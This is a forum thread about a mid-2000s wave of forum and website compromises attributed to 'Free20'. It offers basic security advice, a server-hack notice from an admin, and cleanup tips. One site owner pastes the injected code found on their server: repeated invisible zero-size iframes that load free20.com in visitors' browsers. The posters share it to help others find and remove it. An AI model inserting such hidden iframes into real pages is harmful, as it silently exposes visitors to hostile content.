I Google'd Free20 and it looks like they been pretty busy hacking into a diverse group of forums. Fightingarts, Satannet, a Motley Crue fan board, 3D Realms, Sportbikes... etc.
Times were that is a was a couple of pimplely faced geeks that crack a computer just to see if it could be done. Now-a-days it's a profesional hacking in for info to sell or extort.
It's gotten really bad in the last 2 years, and will only get worse. Keep your anti-viruses up to date (run 2 anti-virus programs if you can) have a physical firewall (router) and a software firewall. Run a spyware program, keep an eye on your processes list and know what processes belong to what. Understanding your computer is the best defense.

Edit::: Oh! and since they got into the password lists, Change not only your password on here. But any other web site where you used the same pasword to login.

If you guys are having trouble with you Internet Explorer they just came out with an upgraded Internet Explorer 7...
http://www.microsoft.com/windows/ie/default.mspx
One of my coworkers downloaded it last night and all he used to use was Firefox and he says this upgraded version is much, much better than Firefox. I'm going to download the upgrade as soon as I get home from work today. Worth a shot...

chances are, these <bleep>holes are using a script to hack UBB boards.

once you've compromised one UBB board, it just flows to another... and another... and another...

the free open sourced phpBB used for our club's site (www.gettinoff4x4.net -- cheap plug) was hit with a massive attack.

thousands were hit.

only defense? update, update and update. and keep good backups.

AS NOTED, OUR SERVER WAS HACKED LAST FRIDAY, MAY 5.

WE HAVE A NEW SERVER ONLINE AND WE WILL BE MIGRATING TO IT THIS WEEK (NLT FRIDAY 5/12). THIS MIGRATION WILL RESOLVE THE ISSUES WITH THE ATTEMPTS AT LOADING SITES AND SPYWARE.

During the actual transition, we expect the server to be down for around 4 hours. This will impact the entire site. A temporary page will be posted to let you know status.

We sincerely apologize for any inconvenience this has caused any and all of you.

In the interim, we suggest you update and/or install antispyware and anti-adware software on your PC; strengthen your browser security (or get an alternative to IE).

Hello,
I have a website that was hacked with the "Free20.com". Now, I know that a lot of people have been saying it is on your pc, not a Server. I just wanted to help you all and anyone else that might need to read this. It CAN be, and was on my Server.
The person(s) used a code that made it invisible. I had to download all of the index HTML, sort through it, then I found it:

[color:"red"] width=0 height=0 frameborder=0
src='http://www.free20.com/portal/index.php?aff=ricardo' marginwidth=0
marginheight=0 vspace=0 hspace=0 allowtransparency=true
scrolling=no></iframe></html> <html><iframe width=0 height=0 frameborder=0
src='http://www.free20.com/portal/index.php?aff=ricardo' marginwidth=0
marginheight=0 vspace=0 hspace=0 allowtransparency=true
scrolling=no></iframe></html> <html><iframe width=0 height=0
frameborder=0 src='http://www.free20.com/portal/index.php?aff=ricardo'
marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true
scrolling=no></iframe></html> <html><iframe width=0 height=0
frameborder=0 src='http://www.free20.com/portal/index.php?aff=ricardo'
marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true
scrolling=no></iframe></html>
DeleteReplyForwardMove... [/color]

I hope this helps.
All I needed to do was delete the index on the Server, delete this code, and upload the Index again.
Any Questions, you can email me at:

We wrote a script to look at every page and delete the inserted code. The hacker put it on more than just index.html - index.php, etc etc.

If you look at your root user's bash history, you'll see exactly what linuxsex@gmail.com did to your server.
